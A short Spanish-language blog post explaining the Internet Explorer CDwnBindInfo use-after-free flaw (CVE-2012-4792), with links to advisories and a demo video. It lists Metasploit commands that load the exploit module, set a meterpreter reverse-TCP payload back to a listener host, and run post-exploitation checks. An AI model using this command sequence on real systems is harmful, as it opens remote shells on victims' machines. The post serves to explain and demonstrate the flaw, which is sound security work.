
Este módulo se aprovecha de un fallo que ocurre cuando el objeto CDwnBindInfo es liberado por FollowHyperlink2, pero una referencia se mantiene en CDOC. Como resultado, cuando se usa la referencia durante la recarga de la página, se puede manipular una parte de la memoria, dando paso así a poder ejecutar código arbitrario.
Les dejo un Vídeo demostrativo donde explotan el fallo con Metasploit:
use exploit/windows/browser/ie_cdwnbindinfo_uaf
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit
sysinfo
getuid
Referencias:http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4792
http://technet.microsoft.com/en-us/security/advisory/2794220
http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/
http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html
http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/
Video:
http://eromang.zataz.com/2012/12/30/microsoft-internet-explorer-cdwnbindinfo-vulnerability-metasploit-demo/
[+] Salu2
0 Notaciones:
Publicar un comentario